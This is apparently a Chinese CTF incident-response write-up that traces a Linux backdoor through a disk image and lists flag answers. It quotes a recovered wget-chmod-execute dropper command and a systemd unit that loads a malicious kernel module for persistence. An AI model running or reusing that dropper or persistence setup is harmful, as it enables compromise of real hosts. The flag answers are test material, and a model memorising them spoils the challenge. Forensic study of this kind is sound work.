第二届长城杯&CISCN半决赛-应急响应

1、找出主机上木马回连的主控端服务器IP地址[不定时(3~5分钟)周期性],并以flag{MD5}形式提交,其中MD5加密目标的原始字符串格式IP:port。

用r-studio打开dd镜像发现桌面有一个被删除的1.txt

wget –quiet http://mirror.unknownrepo.net/f/l/a/g/system_upgrade -O /tmp/.system_upgrade && chmod +x /tmp/.system_upgrade && /tmp/.system_upgrade

于是去找这个.system_upgrade,找不到,再去看看.viminfo。可以得到”/etc/systemd/system/system-upgrade.service”。

7869b222-5a04-4248-8fc2-d8812f5ecf81

顺着这个路径摸过去,能看见

[Unit]

Description=system-upgrade

After=multi-user.target

[Service]

Type=forking

ExecStart=/sbin/insmod /lib/modules/5.4.0-84-generic/kernel/drivers/system/system-upgrade.ko

[Install]

WantedBy=multi-user.target

然后就能找到这个ko文件,把它恢复到本地后用ida打开,在第三个函数里能找到ip地址和三个端口,每个都试一下就能得到flag。

地址是:192.168.57.203:4948

flag{59110f555b5e5cd0a8713a447b082d63}

2、找出主机上驻留的远控木马文件本体,计算该文件的MD5, 结果提交形式: flag{md5}

还是那个ko文件,在里面找到了一个名叫system-agentd的东西,

image-20250707100758767

ssh确认这东西存在,然后把这玩意儿下过来后md5sum一下就好了。

flag{bccad26b665ca175cd02aca2903d8b1e}

3、找出主机上加载远控木马的持久化程序(下载者),其功能为下载并执行远控木马,计算该文件的MD5, 结果提交形式:flag{MD5}。

这个文件不就是那个ko吗。

flag{78edba7cbd107eb6e3d2f90f5eca734e}

4、查找题目3中持久化程序(下载者)的植入痕迹,计算持久化程序植入时的原始名称MD5(仅计算文件名称字符串MD5),并提交对应flag{MD5}。

这不是1.txt里那个吗。

.system_upgrade

flag{9729aaace6c83b11b17b6bc3b340d00b}

5、分析题目2中找到的远控木马,获取木马通信加密密钥, 结果提交形式:flag{通信加密密钥}。

呃,这不是逆向题吗。

老大我们看不懂逆向。

钓鱼事件应急

1、攻击者通过钓鱼攻击拿下来目标主机,请给出攻击者钓鱼使用的漏洞编号,flag格式:flag{CVE-2019-13514}

rdp连上主机,在桌面发现一个漏洞通报的压缩包,传过来发到云沙箱里就可以看见漏洞编号。

image-20250713165856380

flag{CVE-2023-38831}